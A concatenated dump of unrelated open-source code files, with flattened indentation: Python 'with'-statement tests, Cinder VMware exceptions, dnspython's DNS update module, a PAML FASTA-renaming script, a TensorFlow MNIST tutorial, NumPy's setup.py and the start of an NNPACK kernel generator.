def shouldThrow():
with cm():
raise next(iter([]))
self.assertRaises(StopIteration, shouldThrow)
def testRaisedGeneratorExit1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testRaisedGeneratorExit2(self):
# From bug 1462485
class cm (object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testErrorsInBool(self):
# issue4589: __exit__ return code may raise an exception
# when looking at its truth value.
class cm(object):
def __init__(self, bool_conversion):
class Bool:
def __bool__(self):
return bool_conversion()
self.exit_result = Bool()
def __enter__(self):
return 3
def __exit__(self, a, b, c):
return self.exit_result
def trueAsBool():
with cm(lambda: True):
self.fail("Should NOT see this")
trueAsBool()
def falseAsBool():
with cm(lambda: False):
self.fail("Should raise")
self.assertRaises(AssertionError, falseAsBool)
def failAsBool():
with cm(lambda: 1//0):
self.fail("Should NOT see this")
self.assertRaises(ZeroDivisionError, failAsBool)
class NonLocalFlowControlTestCase(unittest.TestCase):
def testWithBreak(self):
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
break
counter += 100 # Not reached
self.assertEqual(counter, 11)
def testWithContinue(self):
counter = 0
while True:
counter += 1
if counter > 2:
break
with mock_contextmanager_generator():
counter += 10
continue
counter += 100 # Not reached
self.assertEqual(counter, 12)
def testWithReturn(self):
def foo():
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
return counter
counter += 100 # Not reached
self.assertEqual(foo(), 11)
def testWithYield(self):
def gen():
with mock_contextmanager_generator():
yield 12
yield 13
x = list(gen())
self.assertEqual(x, [12, 13])
def testWithRaise(self):
counter = 0
try:
counter += 1
with mock_contextmanager_generator():
counter += 10
raise RuntimeError
counter += 100 # Not reached
except RuntimeError:
self.assertEqual(counter, 11)
else:
self.fail("Didn't raise RuntimeError")
class AssignmentTargetTestCase(unittest.TestCase):
def testSingleComplexTarget(self):
targets = {1: [0, 1, 2]}
with mock_contextmanager_generator() as targets[1][0]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][0].__class__, MockResource)
with mock_contextmanager_generator() as list(targets.values())[0][1]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][1].__class__, MockResource)
with mock_contextmanager_generator() as targets[2]:
keys = list(targets.keys())
keys.sort()
self.assertEqual(keys, [1, 2])
class C: pass
blah = C()
with mock_contextmanager_generator() as blah.foo:
self.assertEqual(hasattr(blah, "foo"), True)
def testMultipleComplexTargets(self):
class C:
def __enter__(self): return 1, 2, 3
def __exit__(self, t, v, tb): pass
targets = {1: [0, 1, 2]}
with C() as (targets[1][0], targets[1][1], targets[1][2]):
self.assertEqual(targets, {1: [1, 2, 3]})
with C() as (list(targets.values())[0][2], list(targets.values())[0][1], list(targets.values())[0][0]):
self.assertEqual(targets, {1: [3, 2, 1]})
with C() as (targets[1], targets[2], targets[3]):
self.assertEqual(targets, {1: 1, 2: 2, 3: 3})
class B: pass
blah = B()
with C() as (blah.one, blah.two, blah.three):
self.assertEqual(blah.one, 1)
self.assertEqual(blah.two, 2)
self.assertEqual(blah.three, 3)
class ExitSwallowsExceptionTestCase(unittest.TestCase):
def testExitTrueSwallowsException(self):
class AfricanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return True
try:
with AfricanSwallow():
1/0
except ZeroDivisionError:
self.fail("ZeroDivisionError should have been swallowed")
def testExitFalseDoesntSwallowException(self):
class EuropeanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return False
try:
with EuropeanSwallow():
1/0
except ZeroDivisionError:
pass
else:
self.fail("ZeroDivisionError should have been raised")
class NestedWith(unittest.TestCase):
class Dummy(object):
def __init__(self, value=None, gobble=False):
if value is None:
value = self
self.value = value
self.gobble = gobble
self.enter_called = False
self.exit_called = False
def __enter__(self):
self.enter_called = True
return self.value
def __exit__(self, *exc_info):
self.exit_called = True
self.exc_info = exc_info
if self.gobble:
return True
class InitRaises(object):
def __init__(self): raise RuntimeError()
class EnterRaises(object):
def __enter__(self): raise RuntimeError()
def __exit__(self, *exc_info): pass
class ExitRaises(object):
def __enter__(self): pass
def __exit__(self, *exc_info): raise RuntimeError()
def testNoExceptions(self):
with self.Dummy() as a, self.Dummy() as b:
self.assertTrue(a.enter_called)
self.assertTrue(b.enter_called)
self.assertTrue(a.exit_called)
self.assertTrue(b.exit_called)
def testExceptionInExprList(self):
try:
with self.Dummy() as a, self.InitRaises():
pass
except:
pass
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInEnter(self):
try:
with self.Dummy() as a, self.EnterRaises():
self.fail('body of bad with executed')
except RuntimeError:
pass
else:
self.fail('RuntimeError not reraised')
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInExit(self):
body_executed = False
with self.Dummy(gobble=True) as a, self.ExitRaises():
body_executed = True
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
self.assertTrue(body_executed)
self.assertNotEqual(a.exc_info[0], None)
def testEnterReturnsTuple(self):
with self.Dummy(value=(1,2)) as (a1, a2), \
self.Dummy(value=(10, 20)) as (b1, b2):
self.assertEqual(1, a1)
self.assertEqual(2, a2)
self.assertEqual(10, b1)
self.assertEqual(20, b2)
def test_main():
run_unittest(FailureTestCase, NonexceptionalTestCase,
NestedNonexceptionalTestCase, ExceptionalTestCase,
NonLocalFlowControlTestCase,
AssignmentTargetTestCase,
ExitSwallowsExceptionTestCase,
NestedWith)
if __name__ == '__main__':
test_main()
| lgpl-3.0 |
abusse/cinder | cinder/volume/drivers/vmware/exceptions.py | 2 | 1459 | # Copyright (c) 2015 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Exception definitions.
"""
from oslo_vmware import exceptions
from cinder.i18n import _
class InvalidAdapterTypeException(exceptions.VMwareDriverException):
"""Thrown when the disk adapter type is invalid."""
msg_fmt = _("Invalid disk adapter type: %(invalid_type)s.")
class InvalidDiskTypeException(exceptions.VMwareDriverException):
"""Thrown when the disk type is invalid."""
msg_fmt = _("Invalid disk type: %(disk_type)s.")
class VirtualDiskNotFoundException(exceptions.VMwareDriverException):
"""Thrown when virtual disk is not found."""
msg_fmt = _("There is no virtual disk device.")
class ProfileNotFoundException(exceptions.VMwareDriverException):
"""Thrown when the given storage profile cannot be found."""
msg_fmt = _("Storage profile: %(storage_profile)s not found.")
| apache-2.0 |
jonhadfield/linkchecker | third_party/dnspython/dns/update.py | 108 | 10163 | # Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Dynamic Update Support"""
import dns.message
import dns.name
import dns.opcode
import dns.rdata
import dns.rdataclass
import dns.rdataset
import dns.tsig
class Update(dns.message.Message):
def __init__(self, zone, rdclass=dns.rdataclass.IN, keyring=None,
keyname=None, keyalgorithm=dns.tsig.default_algorithm):
"""Initialize a new DNS Update object.
@param zone: The zone which is being updated.
@type zone: A dns.name.Name or string
@param rdclass: The class of the zone; defaults to dns.rdataclass.IN.
@type rdclass: An int designating the class, or a string whose value
is the name of a class.
@param keyring: The TSIG keyring to use; defaults to None.
@type keyring: dict
@param keyname: The name of the TSIG key to use; defaults to None.
The key must be defined in the keyring. If a keyring is specified
but a keyname is not, then the key used will be the first key in the
keyring. Note that the order of keys in a dictionary is not defined,
so applications should supply a keyname when a keyring is used, unless
they know the keyring contains only one key.
@type keyname: dns.name.Name or string
@param keyalgorithm: The TSIG algorithm to use; defaults to
dns.tsig.default_algorithm. Constants for TSIG algorithms are defined
in dns.tsig, and the currently implemented algorithms are
HMAC_MD5, HMAC_SHA1, HMAC_SHA224, HMAC_SHA256, HMAC_SHA384, and
HMAC_SHA512.
@type keyalgorithm: string
"""
super(Update, self).__init__()
self.flags |= dns.opcode.to_flags(dns.opcode.UPDATE)
if isinstance(zone, (str, unicode)):
zone = dns.name.from_text(zone)
self.origin = zone
if isinstance(rdclass, str):
rdclass = dns.rdataclass.from_text(rdclass)
self.zone_rdclass = rdclass
self.find_rrset(self.question, self.origin, rdclass, dns.rdatatype.SOA,
create=True, force_unique=True)
if not keyring is None:
self.use_tsig(keyring, keyname, algorithm=keyalgorithm)
def _add_rr(self, name, ttl, rd, deleting=None, section=None):
"""Add a single RR to the update section."""
if section is None:
section = self.authority
covers = rd.covers()
rrset = self.find_rrset(section, name, self.zone_rdclass, rd.rdtype,
covers, deleting, True, True)
rrset.add(rd, ttl)
def _add(self, replace, section, name, *args):
"""Add records. The first argument is the replace mode. If
false, RRs are added to an existing RRset; if true, the RRset
is replaced with the specified contents. The second
argument is the section to add to. The third argument
is always a name. The other arguments can be:
- rdataset...
- ttl, rdata...
- ttl, rdtype, string..."""
if isinstance(name, (str, unicode)):
name = dns.name.from_text(name, None)
if isinstance(args[0], dns.rdataset.Rdataset):
for rds in args:
if replace:
self.delete(name, rds.rdtype)
for rd in rds:
self._add_rr(name, rds.ttl, rd, section=section)
else:
args = list(args)
ttl = int(args.pop(0))
if isinstance(args[0], dns.rdata.Rdata):
if replace:
self.delete(name, args[0].rdtype)
for rd in args:
self._add_rr(name, ttl, rd, section=section)
else:
rdtype = args.pop(0)
if isinstance(rdtype, str):
rdtype = dns.rdatatype.from_text(rdtype)
if replace:
self.delete(name, rdtype)
for s in args:
rd = dns.rdata.from_text(self.zone_rdclass, rdtype, s,
self.origin)
self._add_rr(name, ttl, rd, section=section)
def add(self, name, *args):
"""Add records. The first argument is always a name. The other
arguments can be:
- rdataset...
- ttl, rdata...
- ttl, rdtype, string..."""
self._add(False, self.authority, name, *args)
def delete(self, name, *args):
"""Delete records. The first argument is always a name. The other
arguments can be:
- I{nothing}
- rdataset...
- rdata...
- rdtype, [string...]"""
if isinstance(name, (str, unicode)):
name = dns.name.from_text(name, None)
if len(args) == 0:
rrset = self.find_rrset(self.authority, name, dns.rdataclass.ANY,
dns.rdatatype.ANY, dns.rdatatype.NONE,
dns.rdatatype.ANY, True, True)
elif isinstance(args[0], dns.rdataset.Rdataset):
for rds in args:
for rd in rds:
self._add_rr(name, 0, rd, dns.rdataclass.NONE)
else:
args = list(args)
if isinstance(args[0], dns.rdata.Rdata):
for rd in args:
self._add_rr(name, 0, rd, dns.rdataclass.NONE)
else:
rdtype = args.pop(0)
if isinstance(rdtype, (str, unicode)):
rdtype = dns.rdatatype.from_text(rdtype)
if len(args) == 0:
rrset = self.find_rrset(self.authority, name,
self.zone_rdclass, rdtype,
dns.rdatatype.NONE,
dns.rdataclass.ANY,
True, True)
else:
for s in args:
rd = dns.rdata.from_text(self.zone_rdclass, rdtype, s,
self.origin)
self._add_rr(name, 0, rd, dns.rdataclass.NONE)
def replace(self, name, *args):
"""Replace records. The first argument is always a name. The other
arguments can be:
- rdataset...
- ttl, rdata...
- ttl, rdtype, string...
Note that if you want to replace the entire node, you should do
a delete of the name followed by one or more calls to add."""
self._add(True, self.authority, name, *args)
def present(self, name, *args):
"""Require that an owner name (and optionally an rdata type,
or specific rdataset) exists as a prerequisite to the
execution of the update. The first argument is always a name.
The other arguments can be:
- rdataset...
- rdata...
- rdtype, string..."""
if isinstance(name, (str, unicode)):
name = dns.name.from_text(name, None)
if len(args) == 0:
rrset = self.find_rrset(self.answer, name,
dns.rdataclass.ANY, dns.rdatatype.ANY,
dns.rdatatype.NONE, None,
True, True)
elif isinstance(args[0], dns.rdataset.Rdataset) or \
isinstance(args[0], dns.rdata.Rdata) or \
len(args) > 1:
if not isinstance(args[0], dns.rdataset.Rdataset):
# Add a 0 TTL
args = list(args)
args.insert(0, 0)
self._add(False, self.answer, name, *args)
else:
rdtype = args[0]
if isinstance(rdtype, (str, unicode)):
rdtype = dns.rdatatype.from_text(rdtype)
rrset = self.find_rrset(self.answer, name,
dns.rdataclass.ANY, rdtype,
dns.rdatatype.NONE, None,
True, True)
def absent(self, name, rdtype=None):
"""Require that an owner name (and optionally an rdata type) does
not exist as a prerequisite to the execution of the update."""
if isinstance(name, (str, unicode)):
name = dns.name.from_text(name, None)
if rdtype is None:
rrset = self.find_rrset(self.answer, name,
dns.rdataclass.NONE, dns.rdatatype.ANY,
dns.rdatatype.NONE, None,
True, True)
else:
if isinstance(rdtype, (str, unicode)):
rdtype = dns.rdatatype.from_text(rdtype)
rrset = self.find_rrset(self.answer, name,
dns.rdataclass.NONE, rdtype,
dns.rdatatype.NONE, None,
True, True)
def to_wire(self, origin=None, max_size=65535):
"""Return a string containing the update in DNS compressed wire
format.
@rtype: string"""
if origin is None:
origin = self.origin
return super(Update, self).to_wire(origin, max_size)
| gpl-2.0 |
xjw1001001/IGCexpansion | test/Ancestral_reconstruction/PAML/parse reconstructed fasta.py | 1 | 7314 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 10 08:23:33 2017
@author: xjw1001001
"""
#only when PAML in desktop is available,the yeast version only
from Bio import Seq, SeqIO, AlignIO
from Bio.Phylo.PAML import codeml, baseml
import numpy as np
paralog_list = [['YLR406C', 'YDL075W'],
['YER131W', 'YGL189C'],
['YML026C', 'YDR450W'],
['YNL301C', 'YOL120C'],
['YNL069C', 'YIL133C'],
['YMR143W', 'YDL083C'],
['YJL177W', 'YKL180W'],
['YBR191W', 'YPL079W'],
['YER074W', 'YIL069C'],
['YDR418W', 'YEL054C'],
['YBL087C', 'YER117W'],
['YLR333C', 'YGR027C'],
['YMR142C', 'YDL082W'],
['YER102W', 'YBL072C'],
]
for pair in paralog_list:
primalline=[]
fastaline=[]
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:
for line in f.readlines():
primalline.append(line)
sline = '>' + line
sline=sline.replace('node #14','Root'+pair[0])
sline=sline.replace(' ','')
sline=sline.replace('\n','')
sline=sline.replace('node#15','N0'+pair[0])
for i in range(5):
sline=sline.replace('node#' + str(15+1+i),'N'+str(1+i)+pair[1])
sline=sline.replace('node#' + str(20+1+i),'N'+str(1+i)+pair[0])
sline=sline.replace(pair[0],pair[0] + '\n')
sline=sline.replace(pair[1],pair[1] + '\n')
fastaline.append(sline)
f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')
for line in fastaline:
f1.write(line)
f1.write('\n')
f1.close()
#ERa_ERb
pair = ['ERa','ERb']
primalline=[]
fastaline=[]
substitution_dict = {'node#39':'N14ERa','node#38':'N8ERa','node#37':'N7ERa','node#36':'N6ERa','node#41':'N9ERa','node#40':'N5ERa'
,'node#35':'N4ERa','node#44':'N13ERa','node#46':'N12ERa','node#47':'N11ERa','node#45':'N10ERa'
,'node#43':'N3ERa','node#42':'N2ERa','node#34':'N1ERa'
,'node#53':'N14ERb','node#52':'N8ERb','node#51':'N7ERb','node#50':'N6ERb','node#55':'N9ERb','node#54':'N5ERb'
,'node#49':'N4ERb','node#58':'N13ERb','node#60':'N12ERb','node#61':'N11ERb','node#59':'N10ERb'
,'node#57':'N3ERb','node#56':'N2ERb','node#48':'N1ERb'}
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:
for line in f.readlines():
primalline.append(line)
sline = '>' + line
sline=sline.replace('node #32','Root'+pair[0])
sline=sline.replace(' ','')
sline=sline.replace('\n','')
sline=sline.replace('node#33','N0'+pair[0])
for i in substitution_dict.keys():
sline=sline.replace(i,substitution_dict[i])
sline=sline.replace(pair[0],pair[0] + '\n')
sline=sline.replace(pair[1],pair[1] + '\n')
fastaline.append(sline)
f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')
for line in fastaline:
f1.write(line)
f1.write('\n')
f1.close()
#ARa_ERa
pair = ['ARa','ERa']
primalline=[]
fastaline=[]
substitution_dict = {'node#36':'N12ERa','node#35':'N11ERa','node#34':'N7ERa','node#33':'N6ERa','node#32':'N5ERa','node#37':'N8ERa'
,'node#31':'N4ERa','node#41':'N10ERa','node#40':'N9ERa','node#39':'N3ERa','node#38':'N2ERa'
,'node#30':'N1ERa'
,'node#48':'N12ARa','node#47':'N11ARa','node#46':'N7ARa','node#45':'N6ARa','node#44':'N5ARa','node#49':'N8ARa'
,'node#43':'N4ARa','node#53':'N10ARa','node#52':'N9ARa','node#51':'N3ARa','node#50':'N2ARa'
,'node#42':'N1ARa','node#29':'N0ERa','node#28':'RootERa'}
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:
for line in f.readlines():
primalline.append(line)
sline = '>' + line
sline=sline.replace(' ','')
sline=sline.replace('\n','')
for i in substitution_dict.keys():
sline=sline.replace(i,substitution_dict[i])
sline=sline.replace(pair[0],pair[0] + '\n')
sline=sline.replace(pair[1],pair[1] + '\n')
fastaline.append(sline)
f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')
for line in fastaline:
f1.write(line)
f1.write('\n')
f1.close()
#ARGRMRPR
pairlist = [['AR', 'MR'],
['AR', 'GR'],
['AR', 'PR'],
['MR', 'GR'],
['MR', 'PR'],
['PR', 'GR']]
for pair in pairlist:
primalline=[]
fastaline=[]
substitution_dict = {'node#25':'N4'+pair[0],'node#31':'N9'+pair[0],'node#30':'N7'+pair[0]
,'node#32':'N8'+pair[0],'node#29':'N6'+pair[0],'node#28':'N5'+pair[0]
,'node#27':'N3'+pair[0],'node#26':'N2'+pair[0],'node#24':'N1'+pair[0]
,'node#34':'N4'+pair[1],'node#40':'N9'+pair[1],'node#39':'N7'+pair[1]
,'node#41':'N8'+pair[1],'node#38':'N6'+pair[1],'node#37':'N5'+pair[1]
,'node#36':'N3'+pair[1],'node#35':'N2'+pair[1],'node#33':'N1'+pair[1]
,'node#23':'N0'+pair[0],'node#22':'ROOT'+pair[0]
}
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:
for line in f.readlines():
primalline.append(line)
sline = '>' + line
sline=sline.replace(' ','')
sline=sline.replace('\n','')
for i in substitution_dict.keys():
sline=sline.replace(i,substitution_dict[i])
sline=sline.replace(pair[0],pair[0] + '\n')
sline=sline.replace(pair[1],pair[1] + '\n')
fastaline.append(sline)
f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')
for line in fastaline:
f1.write(line)
f1.write('\n')
f1.close()
PAML_parameter_dict = {}
path = '/Users/xjw1001001/Desktop/PAML/'
paralog_list = [['YLR406C', 'YDL075W'],#pair#TODO: other data
['YER131W', 'YGL189C'], ['YML026C', 'YDR450W'], ['YNL301C', 'YOL120C'], ['YNL069C', 'YIL133C'],
['YMR143W', 'YDL083C'], ['YJL177W', 'YKL180W'], ['YBR191W', 'YPL079W'], ['YER074W', 'YIL069C'],
['YDR418W', 'YEL054C'], ['YBL087C', 'YER117W'], ['YLR333C', 'YGR027C'], ['YMR142C', 'YDL082W'],
['YER102W', 'YBL072C'], ['EDN', 'ECP'],['ERa', 'ERb'],['AR', 'MR'],['AR', 'GR'],['AR', 'PR'],
['MR', 'GR'],['MR', 'PR'],['PR', 'GR'] ]
for pair in paralog_list:#parameters: kappa(-5), omega(-1), tau,branches
PAML_parameter_dict['_'.join(pair)] = {}
codeml_result = codeml.read(path+'output/' + '_'.join(pair) + '/out/' + '_'.join(pair) + '_codeml')
#baseml_result = baseml.read('/Users/xjw1001001/Documents/GitHub/IGCexpansion2/test/Ancestral_reconstruction/PAML/output/' + '_'.join(pair) + '/' + '_'.join(pair) + '_baseml')
parameter_list = codeml_result['NSsites'][0]['parameters']['parameter list'].split(' ')
PAML_parameter_dict['_'.join(pair)]['kappa'] = parameter_list[-5]
PAML_parameter_dict['_'.join(pair)]['omega'] = parameter_list[-1]
| gpl-3.0 |
qinjian623/dlnotes | tutorials/tensorflow/mnist_softmax.py | 1 | 2619 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
# Import data
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
FLAGS = None
def main(_):
mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.matmul(x, W) + b
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 10])
# The raw formulation of cross-entropy,
#
# tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.softmax(y)),
# reduction_indices=[1]))
#
# can be numerically unstable.
#
# So here we use tf.nn.softmax_cross_entropy_with_logits on the raw
# outputs of 'y', and then average across the batch.
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, y_))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
sess = tf.InteractiveSession()
# Train
tf.initialize_all_variables().run()
for _ in range(50000):
batch_xs, batch_ys = mnist.train.next_batch(100)
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})
# Test trained model
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(sess.run(accuracy, feed_dict={x: mnist.test.images,
y_: mnist.test.labels}))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='/tmp/data',
help='Directory for storing data')
FLAGS = parser.parse_args()
tf.app.run()
| gpl-3.0 |
dimasad/numpy | setup.py | 21 | 8298 | #!/usr/bin/env python
"""NumPy: array processing for numbers, strings, records, and objects.
NumPy is a general-purpose array-processing package designed to
efficiently manipulate large multi-dimensional arrays of arbitrary
records without sacrificing too much speed for small multi-dimensional
arrays. NumPy is built on the Numeric code base and adds features
introduced by numarray as well as an extended C-API and the ability to
create arrays of arbitrary type which also makes NumPy suitable for
interfacing with general-purpose data-base applications.
There are also basic facilities for discrete fourier transform,
basic linear algebra and random number generation.
"""
from __future__ import division, print_function
DOCLINES = __doc__.split("\n")
import os
import sys
import subprocess
if sys.version_info[:2] < (2, 6) or (3, 0) <= sys.version_info[0:2] < (3, 2):
raise RuntimeError("Python version 2.6, 2.7 or >= 3.2 required.")
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
CLASSIFIERS = """\
Development Status :: 5 - Production/Stable
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: C
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
MAJOR = 1
MINOR = 10
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(cmd, stdout = subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'): os.remove('MANIFEST')
# This is a bit hackish: we are setting a global variable so that the main
# numpy __init__ can detect if it is being loaded by the setup routine, to
# avoid attempting to load components that aren't built yet. While ugly, it's
# a lot more robust than what was previously being used.
builtins.__NUMPY_SETUP__ = True
def get_version_info():
# Adding the git rev number needs to be done inside write_version_py(),
# otherwise the import of numpy.version messes up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('numpy/version.py'):
# must be a source distribution, use existing version file
try:
from numpy.version import git_revision as GIT_REVISION
except ImportError:
raise ImportError("Unable to import git_revision. Try removing " \
"numpy/version.py and the build directory " \
"before building.")
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='numpy/version.py'):
cnt = """
# THIS FILE IS GENERATED FROM NUMPY SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
FULLVERSION, GIT_REVISION = get_version_info()
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version' : FULLVERSION,
'git_revision' : GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
config.add_subpackage('numpy')
config.get_version('numpy/version.py') # sets config.version
return config
def check_submodules():
""" verify that the submodules are checked out and clean
use `git submodule update --init`; on failure
"""
if not os.path.exists('.git'):
return
with open('.gitmodules') as f:
for l in f:
if 'path' in l:
p = l.split('=')[-1].strip()
if not os.path.exists(p):
raise ValueError('Submodule %s missing' % p)
proc = subprocess.Popen(['git', 'submodule', 'status'],
stdout=subprocess.PIPE)
status, _ = proc.communicate()
status = status.decode("ascii", "replace")
for line in status.splitlines():
if line.startswith('-') or line.startswith('+'):
raise ValueError('Submodule not clean: %s' % line)
from distutils.command.sdist import sdist
class sdist_checked(sdist):
""" check submodules on sdist to prevent incomplete tarballs """
def run(self):
check_submodules()
sdist.run(self)
def generate_cython():
cwd = os.path.abspath(os.path.dirname(__file__))
print("Cythonizing sources")
p = subprocess.call([sys.executable,
os.path.join(cwd, 'tools', 'cythonize.py'),
'numpy/random'],
cwd=cwd)
if p != 0:
raise RuntimeError("Running cythonize failed!")
def setup_package():
src_path = os.path.dirname(os.path.abspath(sys.argv[0]))
old_path = os.getcwd()
os.chdir(src_path)
sys.path.insert(0, src_path)
# Rewrite the version file everytime
write_version_py()
metadata = dict(
name = 'numpy',
maintainer = "NumPy Developers",
maintainer_email = "numpy-discussion@scipy.org",
description = DOCLINES[0],
long_description = "\n".join(DOCLINES[2:]),
url = "http://www.numpy.org",
author = "Travis E. Oliphant et al.",
download_url = "http://sourceforge.net/projects/numpy/files/NumPy/",
license = 'BSD',
classifiers=[_f for _f in CLASSIFIERS.split('\n') if _f],
platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
test_suite='nose.collector',
cmdclass={"sdist": sdist_checked},
package_data={'numpy.core': ['libopenblaspy.dll']},
)
# Run build
if len(sys.argv) >= 2 and ('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean')):
# Use setuptools for these commands (they don't work well or at all
# with distutils). For normal builds use distutils.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
FULLVERSION, GIT_REVISION = get_version_info()
metadata['version'] = FULLVERSION
else:
if len(sys.argv) >= 2 and sys.argv[1] == 'bdist_wheel':
# bdist_wheel needs setuptools
import setuptools
from numpy.distutils.core import setup
cwd = os.path.abspath(os.path.dirname(__file__))
if not os.path.exists(os.path.join(cwd, 'PKG-INFO')):
# Generate Cython sources, unless building from source release
generate_cython()
metadata['configuration'] = configuration
try:
setup(**metadata)
finally:
del sys.path[0]
os.chdir(old_path)
return
if __name__ == '__main__':
setup_package()
| bsd-3-clause |
Maratyszcza/NNPACK | src/x86_64-fma/blas/conv1x1.py | 3 | 9327 | from __future__ import absolute_import
from __future__ import division
mr, nr = 2, 4
arg_input_channels = Argument(size_t, "input_channels")
arg_image_size = Argument(size_t, "image_size")
arg_input = Argument(ptr(const_float_), "input")
arg_kernel = Argument(ptr(const_float_), "kernel")
